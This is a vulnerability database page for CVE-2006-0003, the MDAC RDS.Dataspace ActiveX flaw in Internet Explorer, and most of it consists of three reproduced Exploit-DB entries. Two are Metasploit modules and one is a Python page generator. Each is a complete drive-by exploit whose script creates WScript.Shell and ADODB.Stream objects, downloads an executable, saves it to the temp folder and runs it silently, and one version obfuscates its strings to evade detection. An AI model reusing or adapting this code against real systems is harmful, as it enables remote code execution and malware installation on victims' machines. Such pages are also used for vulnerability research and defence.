CVE-2006-0003 : Detail


22h00 +00:00
12h57 +00:00
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CVE Descriptions

Unspecified vulnerability in the RDS.Dataspace ActiveX control, which is contained in ActiveX Data Objects (ADO) and distributed in Microsoft Data Access Components (MDAC) 2.7 and 2.8, allows remote attackers to execute arbitrary code via unknown attack vectors.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE Other No informations.


Metrics Score Severity CVSS Vector Source
V2 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P [email protected]


EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 2164

Publication date : 2006-08-09 22h00 +00:00
Author : H D Moore
EDB Verified : Yes

## # This file is part of the Metasploit Framework and may be redistributed # according to the licenses defined in the Authors field below. In the # case of an unknown or missing license, this file defaults to the same # license as the core Framework (dual GPLv2 and Artistic). The latest # version of the Framework can always be obtained from ## package Msf::Exploit::ie_createobject; use strict; use base "Msf::Exploit"; use Pex::Text; use IO::Socket::INET; use IPC::Open3; my $advanced = { 'Gzip' => [1, 'Enable gzip content encoding'], 'Chunked' => [1, 'Enable chunked transfer encoding'], }; my $info = { 'Name' => 'Internet Explorer COM CreateObject Code Execution', 'Version' => '$Revision: 3753 $', 'Authors' => [ 'H D Moore <hdm [at]>', ], 'Description' => Pex::Text::Freeform(qq{ This module exploits a generic code execution vulnerability in Internet Explorer by abusing vulnerable ActiveX objects. }), 'Arch' => [ 'x86' ], 'OS' => [ 'win32', 'winxp', 'win2003' ], 'Priv' => 0, 'UserOpts' => { 'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ], 'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "" ], }, 'Payload' => { 'Space' => 4000, 'Keys' => ['-bind'], }, 'Refs' => [ ['MSB', 'MS06-014'] ], 'DefaultTarget' => 0, 'Targets' => [ [ 'Automatic' ], # Patched [ 'MS06-014 - RDS.DataControl', '{BD96C556-65A3-11D0-983A-00C04FC29E36}'], # Not marked as safe [ 'UNKNOWN - RDS.DataSpace', '{BD96C556-65A3-11D0-983A-00C04FC29E36}'], # Not marked as safe [ 'UNKNOWN - Business Object Factory ', '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}'], # Not marked as safe [ 'UNKNOWN - Outlook Data Object', '{0006F033-0000-0000-C000-000000000046}'], # Found exploitable in the wild (no details) [ 'UNKNOWN - Outlook.Application', '{0006F03A-0000-0000-C000-000000000046}'], # These are restricted by site (might be exploitable via DNS spoofing + SSL fun) [ 'UNKNOWN - SoftwareDistribution.MicrosoftUpdateWebControl.1', '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}'], [ 'UNKNOWN - SoftwareDistribution.WebControl.1', '{6414512B-B978-451D-A0D8-FCFDF33E833C}'], # Part of the WMI SDK, currently unpatched/unreported [ 'UNKNOWN - WMIScriptUtils.WMIObjectBroker2.1', '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}'], # Visual Studio components, not marked as safe [ 'UNKNOWN - VsmIDE.DTE', '{06723E09-F4C2-43c8-8358-09FCD1DB0766}'], [ 'UNKNOWN - DExplore.AppObj.8.0', '{639F725F-1B2D-4831-A9FD-874847682010}'], [ 'UNKNOWN - VisualStudio.DTE.8.0', '{BA018599-1DB3-44f9-83B4-461454C84BF8}'], [ 'UNKNOWN - Microsoft.DbgClr.DTE.8.0', '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}'], [ 'UNKNOWN - VsaIDE.DTE', '{E8CCCDDF-CA28-496b-B050-6C07C962476B}'], ], 'Keys' => [ 'ie' ], 'DisclosureDate' => '', }; sub new { my $class = shift; my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); return($self); } sub Exploit { my $self = shift; my $server = IO::Socket::INET->new( LocalHost => $self->GetVar('HTTPHOST'), LocalPort => $self->GetVar('HTTPPORT'), ReuseAddr => 1, Listen => 1, Proto => 'tcp' ); my $client; # Did the listener create fail? if (not defined($server)) { $self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT')); return; } my $httphost = ($self->GetVar('HTTPHOST') eq '') ? Pex::Utils::SourceIP('') : $self->GetVar('HTTPHOST'); $self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/"); while (defined($client = $server->accept())) { $self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client)); } return; } sub HandleHttpClient { my $self = shift; my $fd = shift; my $shellcode = my $shellcode = $self->GetVar('EncodedPayload')->Payload; # Set the remote host information my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr); # Read the HTTP command my ($cmd, $url, $proto) = split / /, $fd->RecvLine(10); # Read the HTTP headers my $headers; while ( (my $line = $fd->RecvLine(10))) { $headers .= $line; last if $line eq "\r\n"; } if ($url =~ /\?payload/) { $self->PrintLine("[*] HTTP Client $rhost:$rport asked for payload..."); my $content = Pex::Utils::CreateWin32PE($shellcode, 'ie_createobject'); $fd->Send($self->BuildResponse($content, 'application/octet-stream')); $fd->Close; return; } $self->PrintLine("[*] HTTP Client $rhost:$rport asked for exploit page..."); $fd->Send($self->BuildResponse($self->GenerateHTML(), 'text/html')); $fd->Close; return; } sub GenerateHTML { my $self = shift; my $target_idx = $self->GetVar('TARGET'); my $objects = ""; if ($target_idx == 0) { foreach my $target (@{ $self->Targets }) { if ($target->[1]) { $objects .= "'".$target->[1]."',"; } } } else { my $target = $self->Targets->[$target_idx]; $objects .= "'".$target->[1]."',"; } my $data = qq# <html><head><title></title> <script language="javascript"> function Log(m) { var log = document.createElement('p'); log.innerHTML = m; document.body.appendChild(log); } function CreateO(o, n) { var r = null; try { eval('r = o.CreateObject(n)') }catch(e){} if (! r) { try { eval('r = o.CreateObject(n, "")') }catch(e){} } if (! r) { try { eval('r = o.CreateObject(n, "", "")') }catch(e){} } if (! r) { try { eval('r = o.GetObject("", n)') }catch(e){} } if (! r) { try { eval('r = o.GetObject(n, "")') }catch(e){} } if (! r) { try { eval('r = o.GetObject(n)') }catch(e){} } return(r); } function Go(a) { Log('Creating helper objects...'); var s = CreateO(a, "WScript.Shell"); var o = CreateO(a, "ADODB.Stream"); var e = s.Environment("Process"); Log('Ceating the XMLHTTP object...'); var url = document.location + '?payload'; var xml = null; var bin = e.Item("TEMP") + "metasploit.exe"; var dat; try { xml=new XMLHttpRequest(); } catch(e) { try { xml = new ActiveXObject("Microsoft.XMLHTTP"); } catch(e) { xml = new ActiveXObject("MSXML2.ServerXMLHTTP"); } } if (! xml) return(0); Log('Downloading the payload...');"GET", url, false) xml.send(null); dat = xml.responseBody; Log('Writing the payload to disk...'); o.Type = 1; o.Mode = 3; o.Open(); o.Write(dat); o.SaveToFile(bin, 2); Log('Executing the payload...'); s.Run(bin,0); } function Exploit() { var i = 0; var t = new Array(${objects}null); while (t[i]) { var a = null; if (t[i].substring(0,1) == '{') { a = document.createElement("object"); a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1)); } else { try { a = new ActiveXObject(t[i]); } catch(e){} } if (a) { try { var b = CreateO(a, "WScript.Shell"); if (b) { Log('Loaded ' + t[i]); Go(a); return(0); } } catch(e){} } i++; } Log('Exploit failed.'); } </script> </head> <body onload='Exploit()'> <p>Initializing...</p> </body> </html> #; } sub BuildResponse { my ($self, $content, $type) = @_; $type ||= 'text/plain'; my $response = "HTTP/1.1 200 OK\r\n" . "Content-Type: $type\r\n"; if ($self->GetVar('Gzip')) { $response .= "Content-Encoding: gzip\r\n"; $content = $self->Gzip($content); } if ($self->GetVar('Chunked')) { $response .= "Transfer-Encoding: chunked\r\n"; $content = $self->Chunk($content); } else { $response .= 'Content-Length: ' . length($content) . "\r\n" . "Connection: close\r\n"; } $response .= "\r\n" . $content; return $response; } sub Chunk { my ($self, $content) = @_; my $chunked; while (length($content)) { my $chunk = substr($content, 0, int(rand(10) + 1), ''); $chunked .= sprintf('%x', length($chunk)) . "\r\n$chunk\r\n"; } $chunked .= "0\r\n\r\n"; return $chunked; } sub Gzip { my $self = shift; my $data = shift; my $comp = int(rand(5))+5; my($wtr, $rdr, $err); my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force'); print $wtr $data; close ($wtr); local $/; return (<$rdr>); } 1; # [2006-08-10]
Exploit Database EDB-ID : 16561

Publication date : 2010-09-19 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # $Id: ie_createobject.rb 10394 2010-09-20 08:06:27Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Seh include Msf::Exploit::EXE include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :ua_name => HttpClients::IE, # In badly misconfigured situations, IE7 and 8 could be vulnerable to # this, but by default they throw an ugly popup that stops all script # execution until the user deals with it and aborts everything if they # click "no". Not worth the risk of being unable to try more recent # exploits. Make sure service packs on top of 6.0 are considered less # than the max by setting to 6.1 (which doesn't really exist). :ua_maxver => "6.1", :javascript => true, :os_name => OperatingSystems::WINDOWS, :vuln_test => 'CreateObject', :classid => [ '{BD96C556-65A3-11D0-983A-00C04FC29E36}', '{BD96C556-65A3-11D0-983A-00C04FC29E30}', '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}', '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}', '{6414512B-B978-451D-A0D8-FCFDF33E833C}', '{06723E09-F4C2-43c8-8358-09FCD1DB0766}', '{639F725F-1B2D-4831-A9FD-874847682010}', '{BA018599-1DB3-44f9-83B4-461454C84BF8}', '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}', '{E8CCCDDF-CA28-496b-B050-6C07C962476B}', '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}', '{0006F033-0000-0000-C000-000000000046}', '{0006F03A-0000-0000-C000-000000000046}', ], #:rank => ExcellentRanking # reliable exe writer }) def initialize(info = {}) super(update_info(info, 'Name' => 'Internet Explorer COM CreateObject Code Execution', 'Description' => %q{ This module exploits a generic code execution vulnerability in Internet Explorer by abusing vulnerable ActiveX objects. }, 'License' => MSF_LICENSE, 'Author' => [ 'hdm', ], 'Version' => '$Revision: 10394 $', 'References' => [ # MDAC [ 'MSB', 'MS06-014' ], [ 'CVE', '2006-0003' ], [ 'OSVDB', '24517' ], # WMI Object Broker [ 'MSB', 'MS06-073' ], [ 'CVE', '2006-4704' ], [ 'OSVDB', '30155' ], ], 'Payload' => { 'Space' => 2048, 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', { } ], # Patched [ 'MS06-014 - RDS.DataSpace', { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E36}'} ], # Found in mpack [ 'MS06-014 - RDS.DataSpace', { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E30}'} ], # Patched [ 'MS06-073 - WMIScriptUtils.WMIObjectBroker2.1', { 'CLSID' => '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}'} ], # These are restricted by site (might be exploitable via DNS spoofing + SSL fun) [ 'UNKNOWN - SoftwareDistribution.MicrosoftUpdateWebControl.1', { 'CLSID' => '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}'} ], [ 'UNKNOWN - SoftwareDistribution.WebControl.1', { 'CLSID' => '{6414512B-B978-451D-A0D8-FCFDF33E833C}'} ], # Visual Studio components, not marked as safe [ 'UNKNOWN - VsmIDE.DTE', { 'CLSID' => '{06723E09-F4C2-43c8-8358-09FCD1DB0766}'} ], [ 'UNKNOWN - DExplore.AppObj.8.0', { 'CLSID' => '{639F725F-1B2D-4831-A9FD-874847682010}'} ], [ 'UNKNOWN - VisualStudio.DTE.8.0', { 'CLSID' => '{BA018599-1DB3-44f9-83B4-461454C84BF8}'} ], [ 'UNKNOWN - Microsoft.DbgClr.DTE.8.0', { 'CLSID' => '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}'} ], [ 'UNKNOWN - VsaIDE.DTE', { 'CLSID' => '{E8CCCDDF-CA28-496b-B050-6C07C962476B}'} ], # # The controls below can launch the "installing component" dialogs... # # Not marked as safe [ 'UNKNOWN - Business Object Factory ', { 'CLSID' => '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}'} ], # Not marked as safe [ 'UNKNOWN - Outlook Data Object', { 'CLSID' => '{0006F033-0000-0000-C000-000000000046}'} ], # Found exploitable in the wild (no details) [ 'UNKNOWN - Outlook.Application', { 'CLSID' => '{0006F03A-0000-0000-C000-000000000046}'} ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Apr 11 2006')) end def on_request_uri(cli, request) if (request.uri.match(/payload/)) return if ((p = regenerate_payload(cli)) == nil) data = generate_payload_exe({ :code => p.encoded }) print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) return end # Build out the HTML response page var_html = rand_text_alpha(rand(30)+2) var_func_exploit = rand_text_alpha(rand(30)+2); var_func_go = rand_text_alpha(rand(30)+2); var_func_createo = rand_text_alpha(rand(30)+2); var_exe_name = rand_text_alpha(rand(30)+2); var_objects = '' # Build the object list based on target selection if ( == 'Automatic') targets.each do |t| next if not t['CLSID'] var_objects += t['CLSID'].unpack('C*').map{|c| " '#{c.chr}' "}.join("+") + "," end else var_objects += target['CLSID'].unpack('C*').map{|c| " '#{c.chr}' "}.join("+") + "," end content = %Q^ <html><head><title></title> <script language="javascript"> function #{var_func_createo}( o , n ) { var r = null; try { eval("r=o" + ".C" + "re" + "ate" + "Ob" + "je" + "ct(n)" ) }catch(e){} if (! r) { try { eval("r=o" + ".Cr" + "ea" + "teO" + "bj" + "ect(n,'')" ) }catch(e){} } if (! r) { try { eval("r=o" + ".Cr" + "ea" + "teO" + "bj" + "ect(n,'','')" ) }catch(e){} } if (! r) { try { eval("r=o" + ".Ge" + "tOb" + "je" + "ct('',n)" ) }catch(e){} } if (! r) { try { eval("r=o" + ".Ge" + "tOb" + "ject(n,'')" ) }catch(e){} } if (! r) { try { eval("r=o" + ".Ge" + "tOb" + "ject(n)" ) }catch(e){} } return( r ); } function #{var_func_go}( a ) { var s = #{var_func_createo}( a, "W" + "Sc" + "ri" + "pt" + ".S" + "he" + "ll" ); var o = #{var_func_createo}( a, "A" + "DO" + "D" + "B.S" + "tr" + "eam" ); var e = s.Environment( "P" + "ro" + "ce" + "ss" ); var url = document.location + '/p' + 'ay' + 'lo' + 'ad'; var xml = null; var bin = e.Item( "T" + "E" + "M" + "P" ) + "\\\\#{var_exe_name}" + ".e" + "xe"; var dat; try { xml=new XMLHttpRequest(); } catch(e) { try { xml = new ActiveXObject("Microsoft.XMLHTTP"); } catch(e) { xml = new ActiveXObject("MSXML2.ServerXMLHTTP"); } } if (! xml) { return(0); }"GET", url, false); xml.send(null); dat = xml.responseBody; o.Type = 1 ; o.Mode = 3 ; o.Open ( ) ; o.Write ( dat ) ; o.SaveToFile ( bin, 2) ; s.Run ( bin , 0 ); } function #{var_func_exploit}( ) { var i = 0; var t = new Array( #{var_objects} null ); while (t[i]) { var a = null; if (t[i].substring(0,1) == '{') { a = document.createElement("object"); a.setAttribute("cl" + "as" + "sid", "cl" + "s" + "id" +":" + t[i].substring( 1, t[i].length - 1 ) ) ; } else { try { a = new ActiveXObject(t[i]); } catch(e){} } if (a) { try { var b = #{var_func_createo}( a , "W" + "Sc" + "ri" + "pt" + ".S" + "he" + "ll" ) ; if (b) { #{var_func_go}( a ) ; return(0) ; } } catch(e){ } } i++; } } </script> </head> <body onload='#{var_func_exploit}()'> #{var_html} </body> </html> ^ content = Rex::Text.randomize_space(content) print_status("Sending #{} exploit HTML to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response_html(cli, content) # Handle the payload handler(cli) end end
Exploit Database EDB-ID : 2052

Publication date : 2006-07-20 22h00 +00:00
Author : redsand
EDB Verified : Yes

#!/bin/sh - "exec" "python" "-O" "$0" "$@" __doc__ = """[BL4CK] - MS06-014 RDS.DataStore - Data Execution CVS-2006-0003 MS06-014 April 2006 *** this is a bit out-dated, but works very well *** Usage: ./ index.html Now upload index.html to the same webserver hosting your - [email protected] """ __version__ = "1.0" import sys, random class MS06014: __version = "'[BL4CK] MS06-014 " + __version__ + "\r\n" __html = """ <title></title> <head></head> <body> <script language="VBScript"> on error resume next BL4CK_PAYLOAD </script> <head> <title>[BL4CK] || 404 Not Found</title> </head><body> <h1>Not Found</h1> pwn3d!! <hr> <!-- <script>location.href=''</script> --> </body> </html> """ __payload = """ ' due to how ajax works, the file MUST be within the same local domain dl = "URLFILE" ' create adodbstream object Set df = document.createElement("object") df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" str="Microsoft.XMLHTTP" Set x = df.CreateObject(str,"") a1="Ado" a2="db." a3="Str" a4="eam" str1=a1&a2&a3&a4 str5=str1 set S = df.createobject(str5,"") S.type = 1 ' xml ajax req str6="GET" x.Open str6, dl, False x.Send ' Get temp directory and create our destination name fname1="" set F = df.createobject("Scripting.FileSystemObject","") set tmp = F.GetSpecialFolder(2) ' Get tmp folder fname1= F.BuildPath(tmp,fname1) ' open adodb stream and write contents of request to file ' like vbs dl+exec code S.write x.responseBody ' Saves it with CreateOverwrite flag S.savetofile fname1,2 S.close set Q = df.createobject("Shell.Application","") Q.ShellExecute fname1,"","","open",0 """ def __init__(self, file): self.__file = file def bl4ck(self): self.__payload = self.__payload.replace("URLFILE",self.__file) encoded = self.__payload ret = self.__html.replace("BL4CK_PAYLOAD",encoded) return ret if __name__ == '__main__': url=False out=False print "[BL4CK] MS06-014 - [email protected]" print "url path to file must be on the same domain as the htm file" print "\r\n" argc = len(sys.argv) if(argc <= 2): print "USAGE: %s <download url> <outfile>" % sys.argv[0] sys.exit(0) if(argc > 1): url = sys.argv[1] if(argc > 2): out = sys.argv[2] ms = MS06014(url) ret = ms.bl4ck() try: fsock = open(out, "w+", 0) try: fsock.write(ret ); finally: fsock.close() except IOError: pass print "Wrote %r bytes to: %s" % (len(ret),out) # [2006-07-21]

Products Mentioned

Configuraton 0

Microsoft>>Data_access_components >> Version 2.5

Microsoft>>Data_access_components >> Version 2.7

Microsoft>>Data_access_components >> Version 2.7

Microsoft>>Data_access_components >> Version 2.8

Microsoft>>Data_access_components >> Version 2.8

Microsoft>>Data_access_components >> Version 2.8

Tags : vdb-entry, x_refsource_VUPEN
Tags : third-party-advisory, x_refsource_SECUNIA
Tags : vdb-entry, x_refsource_BID
Tags : vdb-entry, x_refsource_SECTRACK
Tags : third-party-advisory, x_refsource_CERT
Tags : vdb-entry, x_refsource_BID
Tags : exploit, x_refsource_EXPLOIT-DB
Tags : exploit, x_refsource_EXPLOIT-DB
Tags : third-party-advisory, x_refsource_SECUNIA
Tags : third-party-advisory, x_refsource_CERT-VN
Tags : vdb-entry, x_refsource_VUPEN
Tags : vdb-entry, x_refsource_OSVDB